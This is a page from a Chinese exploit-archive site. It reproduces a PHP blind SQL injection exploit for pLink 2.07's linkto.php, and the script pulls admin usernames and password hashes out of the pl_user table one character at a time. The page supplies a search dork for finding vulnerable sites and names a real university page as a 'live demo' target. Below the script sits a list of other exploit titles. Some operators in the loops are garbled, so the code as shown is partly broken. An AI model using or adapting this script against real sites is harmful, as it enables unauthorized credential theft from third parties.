手机
当前位置:查字典教程网 >网络安全 >Exploit >pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
摘要:

<?php

ini_set("max_execution_time",0);

print_r('

###############################################################

#

# pLink 2.07 - Blind SQL Injection Exploit

#

# Vulnerability discovered by: Stack

# Exploit coded by: Stack

# Greetz to: All My Freind

#

###############################################################

#

# Dork: intext:"pLink 2.07"

# Admin Panel: [Target]/link/

# Usage: php '.$argv[0].' [Target] [Userid]

# Example for http://www.site.com/link/linkto.php?id=[Real id] 2

# => php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2

# Live Demo :

# http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2

#

###############################################################

');

if ($argc > 1) {

$url = $argv[1];

if ($argc < 3) {

$userid = 1;

} else {

$userid = $argv[2];

}

$r = strlen(file_get_contents($url." and 1=1/*"));

echo "nExploiting:n";

$w = strlen(file_get_contents($url." and 1=0/*"));

$t = abs((100-($w/$r*100)));

echo "Password: ";

for ($j = 1; $j <= 32; $j ) {

for ($i = 46; $i <= 102; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 102;

}

}

}

echo "nUsername: ";

for ($i=1; $i <= 30; $i ) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$i.",1))!=0/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$count = $i;

$i = 30;

}

}

for ($j = 1; $j < $count; $j ) {

for ($i = 46; $i <= 122; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 122;

}

}

}

} else {

echo "nExploiting failed: By Stackn";

}

?>

【pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit】相关文章:

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

精品推荐
分类导航